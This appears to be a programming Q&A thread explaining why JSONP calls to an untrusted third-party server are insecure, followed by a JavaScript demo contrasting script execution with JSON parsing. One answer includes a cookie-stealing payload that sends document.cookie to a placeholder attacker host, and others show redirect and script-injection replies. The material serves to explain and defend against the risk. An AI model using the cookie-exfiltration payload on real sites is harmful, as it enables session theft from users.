Alec Smart

Reputation: 95900

jQuery JSONP Security

I am trying to convince a team that using a jQuery JSONP call with an untrusted third party might be insecure. I am using the standard jQuery code:

$.ajax({
    url: unsecureserver + "?json_callback=?",   // jQuery replaces the "?" with a generated callback name
    dataType: 'jsonp',                          // comma was missing here
    success: function(data) {
        // doing processing here
    }
});

I need some help on what kind of insecure data to return which could cause issues, e.g. showing an alert message. For example, a JSON statement like:

 { "success": true } alert('hi');

Any suggestions what I should replace the above with so that it works with jQuery?

Upvotes: 1

Views: 612

Answers (3)

SilverlightFox

Reputation: 33538

JSONP is not called from an $.ajax call, but it is included in the page like so:

<script src="http://external-server.example.com/getNames?callback=foo"></script>

Including a <script> tag pointing to an external domain is basically giving full trust to that domain, as any script code returned will execute in the context of your domain, giving the external resource full access to your DOM. The script can do what it likes: it can access any non-HttpOnly cookie values, or it could redirect the user away.

Drop this code into your test external server:

document.location.href = 'http://www.google.com/';

and access it via the script tag, and the user will be redirected away from your site.

Upvotes: 1

Royi Namir

Reputation: 148524

need some help on what kind of insecure data to return which could cause issues

I will start with this:

There is no difference between the way JSONP works and <script src='whatever'></script>.

Now, use your imagination as to what the pitfalls are.

Basically the third party should return something like myCallback({"data":"1"});

But he can also send something like:

var img = document.createElement('img');
img.src = 'http://myBadSite.com/ImgHandler?' + document.cookie; // that's where HttpOnly comes in

JSONP is data padded with a method call. BUT

the content type is application/javascript!!!!! Which means he can run whatever he wants...

Look at this sample: http://jsbin.com/IMaKUQId/3/edit


Edit:

He can also send you this:

myCallback(function (){get the sh** from this browser }());

P.S. If you have to convince him about this, he probably has a lot to learn.

Upvotes: 2

Rovak

Reputation: 778

JSONP includes a JavaScript file using the script tag, and the response should include a function which is named after the json_callback parameter. This means that any code can be run. With the following call:

$.ajax({
    url: unsecureserver + "?json_callback=callback",   // fixed callback name, so the server emits callback(...)
    dataType: 'jsonp',                                 // comma was missing here
    success: function(data) {
        // doing processing here
    }
});

The response, which may contain insecure code:

document.write('evil content');
alert('hi');
callback({ "success": true });

Upvotes: 3
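The point all three answers make, with Rovak's response body as the input, can be shown without a browser. What follows is an added example of my own, not code from the question or from any of the answers: `loadJsonp` models what jQuery's `dataType:'jsonp'` does (insert a script tag, let the reply run as code) and `loadJson` models the alternative of fetching plain JSON and parsing it. `new Function()` stands in for the browser's script execution, the callback name `callback` is the one from Rovak's answer, and `fakeAlert`, `loadJsonp`, `loadJson` and `demo` are names invented for this demo.

```javascript
// Added example (mine, not code from the question or any answer): a plain
// JavaScript model of what the browser does with a JSONP reply, so the
// difference between EXECUTING a response and PARSING it is visible without
// a browser. jQuery's dataType:'jsonp' inserts a <script src=...> tag and the
// reply runs as script; here new Function() stands in for that step (an
// assumption made for the demo, not anything jQuery itself does).

// Side effects the untrusted reply manages to cause, recorded for inspection.
const sideEffects = [];

// Stand-in for a page global the reply can reach, e.g. window.alert.
function fakeAlert(msg) {
  sideEffects.push("alert:" + msg);
}

// JSONP path: register the callback, then run the whole reply as code.
function loadJsonp(responseText, callbackName) {
  let received = null;
  const callback = (data) => { received = data; };
  // Every statement in responseText executes, not only the callback call.
  const script = new Function("alert", callbackName, responseText);
  script(fakeAlert, callback);
  return received;
}

// JSON path (what a CORS-enabled request plus JSON.parse would do): the body
// is data, and anything that is not valid JSON is rejected with a SyntaxError.
function loadJson(responseText) {
  return JSON.parse(responseText);
}

// Constructed replies for the demo: the honest one and the padded one from
// Rovak's answer (document.write left out, since there is no document here).
const honestReply = 'callback({"success": true});';
const paddedReply = "alert('hi'); callback({\"success\": true});";

function demo() {
  sideEffects.length = 0;
  const fromHonest = loadJsonp(honestReply, "callback");
  const fromPadded = loadJsonp(paddedReply, "callback");   // alert runs first
  let jsonError = null;
  try {
    loadJson(paddedReply);
  } catch (e) {
    jsonError = e.name;
  }
  return {
    fromHonest,                    // { success: true }
    fromPadded,                    // { success: true }: the callback still fires, so the page sees nothing wrong
    effects: sideEffects.slice(),  // ["alert:hi"]: the extra statement ran with the page's privileges
    jsonError,                     // "SyntaxError": the same body is rejected when treated as data
  };
}

console.log(JSON.stringify(demo()));
```

Run it with `node` and compare the two results: the JSONP path hands the page the expected `{ success: true }` while also having executed the padding, whereas the JSON path refuses the body outright. That is the practical difference to put in front of the team: request JSON over CORS and parse it, and reserve JSONP for a party trusted as much as your own code.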
